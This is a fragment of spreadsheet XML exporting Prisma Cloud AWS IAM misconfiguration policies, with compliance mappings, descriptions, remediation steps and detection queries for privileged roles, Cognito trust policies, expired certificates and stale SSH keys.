        </is>
      </c>
      <c r="B1967" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C1967" s="2" t="inlineStr"/>
      <c r="D1967" t="n">
        <v>0</v>
      </c>
      <c r="E1967" t="n">
        <v>171</v>
      </c>
      <c r="F1967" t="n">
        <v>0</v>
      </c>
      <c r="G1967" t="b">
        <v>1</v>
      </c>
      <c r="H19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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1967" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1967" t="inlineStr">
        <is>
          <t>AWS IAM Roles with Administrator Access Permissions</t>
        </is>
      </c>
      <c r="L1967" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M1967" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1967" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1967" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1967" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1967" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R1967" t="inlineStr">
        <is>
          <t>ISM-1006</t>
        </is>
      </c>
      <c r="S1967" t="inlineStr">
        <is>
          <t>Policy Status Review,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1967" t="b">
        <v>0</v>
      </c>
      <c r="U1967" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1967" t="inlineStr">
        <is>
          <t>aws-iam-list-roles</t>
        </is>
      </c>
      <c r="W1967" t="inlineStr">
        <is>
          <t>This policy identifies AWS IAM roles which has administrator access permission set. This would allow all users who assume this role to have administrative privileges. As a security best practice, it is recommended to grant least privilege access like granting only the permissions required to perform a task, instead of providing excessive permissions.</t>
        </is>
      </c>
      <c r="X1967" t="inlineStr">
        <is>
          <t>1. Log in to AWS console
2. Navigate to IAM service
3. Click on Roles
4. Click on reported IAM role
5. Under 'Permissions policies' click on 'X' to detach or remove the policy having excessive permissions and assign a limited permission policy as required for a particular role.</t>
        </is>
      </c>
      <c r="Y1967" t="inlineStr"/>
      <c r="Z1967" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-list-roles' as X; config from cloud.resource where api.name = 'aws-iam-get-policy-version' as Y; filter "($.X.inlinePolicies[*].policyDocument.Statement[?(@.Effect=='Allow' &amp;&amp; @.Resource=='*')].Action any equal *) or ($.X.attachedPolicies[*].policyArn contains $.Y.policyArn and $.Y.document.Statement[?(@.Effect=='Allow' &amp;&amp; @.Resource=='*')].Action any equal *)"; show X;</t>
        </is>
      </c>
      <c r="AA1967" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1967" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1967" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-539</t>
        </is>
      </c>
      <c r="AD1967" t="b">
        <v>1</v>
      </c>
      <c r="AE1967" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1967" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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7" t="inlineStr">
        <is>
          <t>be3486cb-f18d-438a-8b14-7a38fe9d2a04</t>
        </is>
      </c>
      <c r="AI1967" t="inlineStr">
        <is>
          <t>9cb0701c-7b6d-4ad6-93a2-2342e3c8e296</t>
        </is>
      </c>
      <c r="AJ1967" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1967" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1968">
      <c r="A1968" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, CIS Controls v8.1, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Secure Controls Framework (SCF) - 2024.2, SOC 2, NYDFS 23 CRR-NY 500.0, CIS Controls v8.1, CSA CCM v4.0.12, ISO/IEC 27001:2022, NIST 800-53 Rev 5, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27001:2022</t>
        </is>
      </c>
      <c r="B1968" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1968" s="2" t="inlineStr"/>
      <c r="D1968" t="inlineStr"/>
      <c r="E1968" t="inlineStr"/>
      <c r="F1968" t="inlineStr"/>
      <c r="G1968" t="b">
        <v>1</v>
      </c>
      <c r="H19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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1968" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1968" t="inlineStr">
        <is>
          <t>AWS Cognito service role with wide privileges does not validate authentication</t>
        </is>
      </c>
      <c r="L1968" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M1968" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1968" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1968" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1968" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1968" t="inlineStr">
        <is>
          <t>Organisational Controls</t>
        </is>
      </c>
      <c r="R1968" t="inlineStr">
        <is>
          <t>A5.15</t>
        </is>
      </c>
      <c r="S1968" t="inlineStr"/>
      <c r="T1968" t="b">
        <v>0</v>
      </c>
      <c r="U1968" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1968" t="inlineStr">
        <is>
          <t>aws-iam-list-roles</t>
        </is>
      </c>
      <c r="W1968" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Cognito service role that has wide privileges and does not validate user authentication.
AWS Cognito is an identity and access management service for web and mobile apps. AWS Cognito service roles define permissions for AWS services accessing resources. The 'amr' field in the service role represents how the user was authenticated. if the user was authenticated using any of the supported providers, the 'amr' will contain 'authenticated' and the name of the provider. Not validating the 'amr' field can allow an unauthenticated user (guest access) with a valid token signed by the identity-pool to assume the Cognito role. If this Cognito role has a '*' wildcard in the action and resource, it could lead to lateral movement or unauthorized access.
Ensuring limiting privileges according to business requirements can help in restricting unauthorized access and misuse of resources. It is recommended to limit the Cognito service role used for guest access to not have a '*' wildcard in the action or resource.</t>
        </is>
      </c>
      <c r="X1968" t="inlineStr">
        <is>
          <t>To remove the policy which have excessive permission from the guess access role,
1. Log in to the AWS console.
2. Navigate to the IAM service.
3. Click on Roles.
4. Click on the reported IAM role.
5. Under 'Permissions policies' section, remove the policy having excessive permissions and assign a limited permission policy as required for a particular role.</t>
        </is>
      </c>
      <c r="Y1968" t="inlineStr"/>
      <c r="Z1968" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'aws-iam-list-roles' AND json.rule = role.assumeRolePolicyDocument.Statement[*].Action contains "sts:AssumeRoleWithWebIdentity" and role.assumeRolePolicyDocument.Statement[*].Principal.Federated contains "cognito-identity.amazonaws.com" and role.assumeRolePolicyDocument.Statement[*].Effect contains "Allow" and role.assumeRolePolicyDocument.Statement[*].Condition contains "cognito-identity.amazonaws.com:amr" and role.assumeRolePolicyDocument.Statement[*].Condition contains "unauthenticated" as X; config from cloud.resource where api.name = 'aws-iam-get-policy-version' AND json.rule = document.Statement[?any(Effect equals Allow and Action contains :* and Resource equals * )] exists as Y; filter "($.X.inlinePolicies[*].policyDocument.Statement[?(@.Effect=='Allow' &amp;&amp; @.Resource=='*')].Action contains :* ) or ($.X.attachedPolicies[*].policyArn intersects $.Y.policyArn)"; show X;</t>
        </is>
      </c>
      <c r="AA1968" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1968" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1968" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-1123</t>
        </is>
      </c>
      <c r="AD1968" t="b">
        <v>1</v>
      </c>
      <c r="AE1968" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1968" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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8" t="inlineStr">
        <is>
          <t>487d78f9-875c-44e7-ba4a-d1b945f404b4</t>
        </is>
      </c>
      <c r="AI1968" t="inlineStr">
        <is>
          <t>d26533cf-1078-48f4-9524-86e0c8555e3d</t>
        </is>
      </c>
      <c r="AJ1968" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1968" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1969">
      <c r="A1969" t="inlineStr">
        <is>
          <t>SOC 2, NYDFS 23 CRR-NY 500.0, ISO/IEC 27001:2022, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B1969" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1969" s="2" t="inlineStr"/>
      <c r="D1969" t="inlineStr"/>
      <c r="E1969" t="inlineStr"/>
      <c r="F1969" t="inlineStr"/>
      <c r="G1969" t="b">
        <v>1</v>
      </c>
      <c r="H19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69" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1969" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1969" t="inlineStr">
        <is>
          <t>AWS Cognito service role does not have identity pool verification</t>
        </is>
      </c>
      <c r="L1969" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M1969" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1969" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1969" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1969" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1969" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R1969" t="inlineStr">
        <is>
          <t>Access Enforcement | Role-based Access Control</t>
        </is>
      </c>
      <c r="S1969" t="inlineStr"/>
      <c r="T1969" t="b">
        <v>0</v>
      </c>
      <c r="U1969" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1969" t="inlineStr">
        <is>
          <t>aws-iam-list-roles</t>
        </is>
      </c>
      <c r="W1969" t="inlineStr">
        <is>
          <t>This policy identifies the AWS Cognito service role that does not have identity pool verification.
AWS Cognito is an identity and access management service for web and mobile apps. AWS Cognito service roles define permissions for AWS services accessing resources. The 'aud' claim in a cognito service role is an identity pool token that specifies the intended audience for the token. If the aud claim is not enforced in the cognito service role trust policy, it could potentially allow tokens issued for one audience to be used to access resources intended for a different audience. This oversight increases the risk of unauthorized access, compromising access controls and elevating the potential for data breaches within the AWS environment.
It is recommended to implement proper validation of the 'aud' claim by adding the 'aud' in the Cognito service role trust policy.</t>
        </is>
      </c>
      <c r="X1969" t="inlineStr">
        <is>
          <t>To mitigate the absence of 'aud' claim validation in service roles associated with Cognito identity pools, follow these steps:
1. Sign in to the AWS Management Console and open the IAM console at https://console.aws.amazon.com/iam/.
2. In the navigation pane of the IAM console, choose 'Roles'.
3. In the list of roles in account, choose the name of the role that is reported.
4. Choose the 'Trust relationships' tab, and then choose 'Edit trust policy'.
5. Edit the trust policy, add a condition to verify that the 'aud' claim matches the expected identity pool.
6. Click 'Update Policy'.
Refer to the below link to add the required aud validation in service roles
https://docs.aws.amazon.com/cognito/latest/developerguide/role-based-access-control.html#creating-roles-for-role-mapping</t>
        </is>
      </c>
      <c r="Y1969" t="inlineStr"/>
      <c r="Z1969" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-list-roles' AND json.rule = role.assumeRolePolicyDocument.Statement[*].Action contains "sts:AssumeRoleWithWebIdentity" and role.assumeRolePolicyDocument.Statement[*].Principal.Federated contains "cognito-identity.amazonaws.com" and role.assumeRolePolicyDocument.Statement[*].Effect contains "Allow" and role.assumeRolePolicyDocument.Statement[*].Condition.StringEquals does not contain "cognito-identity.amazonaws.com:aud"</t>
        </is>
      </c>
      <c r="AA1969" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1969" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1969" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-1126</t>
        </is>
      </c>
      <c r="AD1969" t="b">
        <v>1</v>
      </c>
      <c r="AE1969" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1969" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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69" t="inlineStr">
        <is>
          <t>7ae69a11-ae24-4883-aba9-b230ba90a5c8</t>
        </is>
      </c>
      <c r="AI1969" t="inlineStr">
        <is>
          <t>5deb0cae-2b39-4797-ba96-ccb3a3e1b362</t>
        </is>
      </c>
      <c r="AJ1969" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1969" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1970">
      <c r="A1970" t="inlineStr">
        <is>
          <t>HIPAA, CIS Controls v8, ISO/IEC 27001:2022, CSA CCM v.4.0.1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27001:2022, PCI DSS v3.2.1, TX-RAMP Level 2, APRA (CPS 234) Information Security, CSA CCM v.4.0.6, ISO/IEC 27002:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Matt's ATT&amp;ACK, CSA CCM v.4.0.6, ISO 27002:2022, NIST SP 800-172, Risk Management in Technology (RMiT), ISO/IEC 27002:2013, MLPS 2.0 (Level 3), Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v6.3 [Deprecated], kashan ACSC Information Security Manual (ISM), CDC NIST 800-53 Rev4, Secure Controls Framework (SCF) - 2024.2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, ISO/IEC 27018:2019, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), HITRUST CSF v.11.2.0, ISO/IEC 27002:2013, NIST 800-53 Rev 5, NIST CSF, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), CIS v2.0.0 (AWS) - Level 1, Fedramp (Moderate), ISO/IEC 27002:2013, ISO/IEC 27002:2013, NIST SP 800-171 Revision 2, CSA CCM v4.0.12, MAS TRM 2021, CSA CCM v.4.0.6, NIST 800-53 Rev 5, NIST CSF v2.0, CyberSecurity Law of the People's Republic of China, MTSBv2_AWS, Fedramp (Moderate), CyberSecurity Law of the People's Republic of China, jneytchev-fedramp-low, CSA CCM v.4.0.6, Fedramp (Low), ISO 27002:2022, ISO/IEC 27017:2015, ISO/IEC 27001:2022, CIS v1.5.0 (AWS) - Level 1, Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27001:2022, ISO/IEC 27017:2015, NIST 800-53 Rev4, kfirdaus AWS Account-CS, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v12, DORA, ISO/IEC 27002:2013, TX-RAMP Level 2, CSA CCM v4.0.12, ISO/IEC 27002:2013, MLPS 2.0, CIS v1.4.0 (AWS), Microsoft Cloud Security Benchmark v1, MLPS 2.0 (Level 2), CSA CCM v4.0.12, NIST 800-53 Rev4, CIS v3.0.0 (AWS) Level 1, FFIEC, wells fargo CIS v1.5.0 (AWS) - Level 1, ISO/IEC 27018:2019, MITRE ATT&amp;CK v10.0 [Deprecated], CRI Profile v2.0, Copy of CIS Controls v8, ISO/IEC 27017:2015, MAS TRM 2021, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v.4.0.1, CSA CCM v.4.0.1, CHC HITRUST CSF v.9.6.0, CDC NIST 800-53 Rev4, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS v1.3.0 (AWS), CSA CCM v4.0.12, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, Microsoft Cloud Security Benchmark v1, NIST SP 800-171 Revision 3, AWS Well-Architected Framework, GDPR, RBI Baseline Cyber Security and Resilience Requirements, SOC 2, NIST CSF, CSA CCM v.4.0.6, NIST 800-53 Rev 5, ISO/IEC 27002:2013, MAS TRM 2021, ISO/IEC 27002:2013, ISO/IEC 27001:2022, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, CSA CCM v4.0.12, Secure Controls Framework (SCF) - 2022.2.1, CCPA 2018, PIPEDA, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), DORA, ISO/IEC 27002:2013, CyberSecurity Law of the People's Republic of China, PCI DSS v4.0, CIS Controls v7.1, Brazilian Data Protection Law (LGPD), CyberSecurity Law of the People's Republic of China, ISO/IEC 27002:2013, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ITSG-33, Sarbanes Oxley Act (SOX), HITRUST CSF v.9.6.0, ISO 27002:2022, CSA CCM v.4.0.1, NIST SP 800-172, ACSC Information Security Manual (ISM), Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev 5, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B1970" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1970" s="2" t="inlineStr"/>
      <c r="D1970" t="inlineStr"/>
      <c r="E1970" t="inlineStr"/>
      <c r="F1970" t="inlineStr"/>
      <c r="G1970" t="b">
        <v>1</v>
      </c>
      <c r="H19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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1970" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1970" t="inlineStr">
        <is>
          <t>AWS IAM has expired SSL/TLS certificates</t>
        </is>
      </c>
      <c r="L1970" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1970" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1970" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1970" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1970" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1970" t="inlineStr">
        <is>
          <t>SC-1</t>
        </is>
      </c>
      <c r="R1970" t="inlineStr">
        <is>
          <t>SC-12</t>
        </is>
      </c>
      <c r="S1970" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1970" t="b">
        <v>0</v>
      </c>
      <c r="U1970" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1970" t="inlineStr">
        <is>
          <t>aws-iam-list-server-certificates</t>
        </is>
      </c>
      <c r="W1970" t="inlineStr">
        <is>
          <t>This policy identifies expired SSL/TLS certificates. To enable HTTPS connections to your website or application in AWS, you need an SSL/TLS server certificate. You can use ACM or IAM to store and deploy server certificates. Removing expired SSL/TLS certificates eliminates the risk that an invalid certificate will be deployed accidentally to a resource such as AWS Elastic Load Balancer (ELB), which can damage the credibility of the application/website behind the ELB. This policy generates alerts if there are any expired SSL/TLS certificates stored in AWS IAM. As a best practice, it is recommended to delete expired certificates.</t>
        </is>
      </c>
      <c r="X1970" t="inlineStr">
        <is>
          <t>Removing invalid certificates via AWS Management Console is not currently supported. To delete SSL/TLS certificates stored in IAM via the AWS API use the Command Line Interface (CLI).
Remediation CLI:
1. Run describe-load-balancers command to make sure that the expired server certificate is not currently used by any active load balancer.
 aws elb describe-load-balancers --region &lt;COMPUTE_REGION&gt; --load-balancer-names &lt;ELB_NAME&gt; --query 'LoadBalancerDescriptions[*].ListenerDescriptions[*].Listener.SSLCertificateId'
This command output will return the Amazon Resource Name (ARN) for the SSL certificate currently used by the selected ELB:
 [
  [
   "arn:aws:iam::1234567890:server-certificate/MyCertificate"
  ]
 ]
2.  If the load balancer listener using the reported expired certificate is not removed before the certificate, the ELB may continue to use the same certificate and work improperly. To delete the ELB listener that is using the expired SSL certificate, run following command:
 aws elb delete-load-balancer-listeners --region &lt;COMPUTE_REGION&gt; --load-balancer-name &lt;ELB_NAME&gt; --load-balancer-ports 443
3. Now that is safe to remove the expired SSL/TLS certificate from AWS IAM, To delete it run:
 aws iam delete-server-certificate --server-certificate-name &lt;CERTIFICATE_NAME&gt;</t>
        </is>
      </c>
      <c r="Y1970" t="inlineStr"/>
      <c r="Z1970" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-list-server-certificates' AND json.rule = '(_DateTime.ageInDays($.expiration) &gt; -1)'</t>
        </is>
      </c>
      <c r="AA1970" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1970" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1970" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-167</t>
        </is>
      </c>
      <c r="AD1970" t="b">
        <v>1</v>
      </c>
      <c r="AE1970" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1970" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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0" t="inlineStr">
        <is>
          <t>5a63ca23-75be-4fb7-9b52-c5392dce1553</t>
        </is>
      </c>
      <c r="AI1970" t="inlineStr">
        <is>
          <t>5ebc3edf-081a-4400-893f-843243bdff2e</t>
        </is>
      </c>
      <c r="AJ1970" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1970" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1971">
      <c r="A1971" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, MITRE ATT&amp;CK v10.0 [Deprecated], NIST 800-53 Rev 5, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CSA CCM v4.0.12, MLPS 2.0 (Level 3), Secure Controls Framework (SCF) - 2024.2, kashan ACSC Information Security Manual (ISM), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, PCI DSS v3.2.1, NIST SP 800-171 Revision 2, MITRE ATT&amp;CK v6.3 [Deprecated], HITRUST v.9.4.2 [Deprecated], Matt's ATT&amp;ACK, CDC NIST 800-53 Rev4, Copy of ACSC Information Security Manual (ISM)-clone, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), TX-RAMP Level 1, MLPS 2.0, NIST CSF, Microsoft Cloud Security Benchmark v1, ISO/IEC 27002:2013, MITRE ATT&amp;CK v6.3 [Deprecated], ISO/IEC 27002:2013, MAS TRM 2021, TX-RAMP Level 2, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, CIS Controls v8.1, PCI DSS v4.0, RBI Baseline Cyber Security and Resilience Requirements, CyberSecurity Law of the People's Republic of China, MITRE ATT&amp;CK v12, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, CIS Controls v7.1, ISO/IEC 27017:2015, GDPR, MITRE ATT&amp;CK v8.2 [Deprecated], CHC HITRUST CSF v.9.6.0, ISO/IEC 27002:2013, ISO/IEC 27002:2013, MITRE ATT&amp;CK v12, ACSC Information Security Manual (ISM), TX-RAMP Level 2, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v6.3 [Deprecated], MITRE ATT&amp;CK v12, MLPS 2.0 (Level 2), MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, ISO/IEC 27017:2015, MAS TRM 2021, CSA CCM v.4.0.1, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Cybersecurity Maturity Model Certification (CMMC) v.1.02, MITRE ATT&amp;CK v8.2 [Deprecated], MITRE ATT&amp;CK v6.3 [Deprecated], APRA (CPS 234) Information Security, NIST CSF, CIS Controls v8, NIST SP 800-171 Revision 3, AWS Well-Architected Framework, Matt's ATT&amp;ACK, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, HITRUST CSF v.11.2.0, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.6, ITSG-33, ISO/IEC 27002:2013, MAS TRM 2021, HITRUST CSF v.9.6.0, NIST 800-53 Rev4, Copy of CIS Controls v8, NIST SP 800-172, CSA CCM v4.0.12, ITSG-33, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, ISO/IEC 27002:2013, Sarbanes Oxley Act (SOX), Matt's ATT&amp;ACK, Brazilian Data Protection Law (LGPD), MITRE ATT&amp;CK v6.3 [Deprecated], CSA CCM v.4.0.1, Brazilian Data Protection Law (LGPD), Matt's ATT&amp;ACK, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B1971" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1971" s="2" t="inlineStr"/>
      <c r="D1971" t="inlineStr"/>
      <c r="E1971" t="inlineStr"/>
      <c r="F1971" t="inlineStr"/>
      <c r="G1971" t="b">
        <v>1</v>
      </c>
      <c r="H19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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1971" t="inlineStr">
        <is>
          <t>aws-iam</t>
        </is>
      </c>
      <c r="K1971" t="inlineStr">
        <is>
          <t>AWS IAM SSH keys for AWS CodeCommit have aged more than 90 days without being rotated</t>
        </is>
      </c>
      <c r="L1971" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M1971" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1971" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1971" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1971" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q1971" t="inlineStr">
        <is>
          <t>TA0003</t>
        </is>
      </c>
      <c r="R1971" t="inlineStr">
        <is>
          <t>T1078 - Valid Accounts (TA0003) (TA0003)</t>
        </is>
      </c>
      <c r="S1971" t="inlineStr">
        <is>
          <t>Identity Misconfiguration,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T1971" t="b">
        <v>0</v>
      </c>
      <c r="U1971" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1971" t="inlineStr">
        <is>
          <t>aws-iam-list-ssh-public-keys</t>
        </is>
      </c>
      <c r="W1971" t="inlineStr">
        <is>
          <t>This policy identifies all of your IAM SSH public keys which haven't been rotated in the past 90 days. It is recommended to verify that they are rotated on a regular basis in order to protect your AWS CodeCommit repositories.</t>
        </is>
      </c>
      <c r="X1971" t="inlineStr">
        <is>
          <t>1. Login to AWS Console
2. Goto IAM and select Users
3. Choose the reported user
4. Goto Security Credential
5. Delete the SSH Key ID and upload a new SSH Key
Key creation steps: https://docs.aws.amazon.com/codecommit/latest/userguide/setting-up-ssh-unixes.html</t>
        </is>
      </c>
      <c r="Y1971" t="inlineStr"/>
      <c r="Z1971" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'aws' AND api.name = 'aws-iam-list-ssh-public-keys' AND json.rule = '(_DateTime.ageInDays($.uploadDate) &gt; 91) and status==Active'</t>
        </is>
      </c>
      <c r="AA1971" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1971" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1971" t="inlineStr">
        <is>
          <t>PC-AWS-IAM-264</t>
        </is>
      </c>
      <c r="AD1971" t="b">
        <v>1</v>
      </c>
      <c r="AE1971" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1971" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG19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1" t="inlineStr">
        <is>
          <t>3fb665cb-d0af-42e7-ba0f-1ddccd82356b</t>
        </is>
      </c>
      <c r="AI1971" t="inlineStr">
        <is>
          <t>1e93c308-f2d6-410d-9a82-7c8e2f9e466d</t>
        </is>
      </c>
      <c r="AJ1971" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK1971" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1972">
      <c r="A1972" t="inlineStr"/>
      <c r="B1972" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1972" s="2" t="inlineStr"/>
      <c r="D1972" t="inlineStr"/>
      <c r="E1972" t="inlineStr"/>
      <c r="F1972" t="inlineStr"/>
      <c r="G1972" t="b">
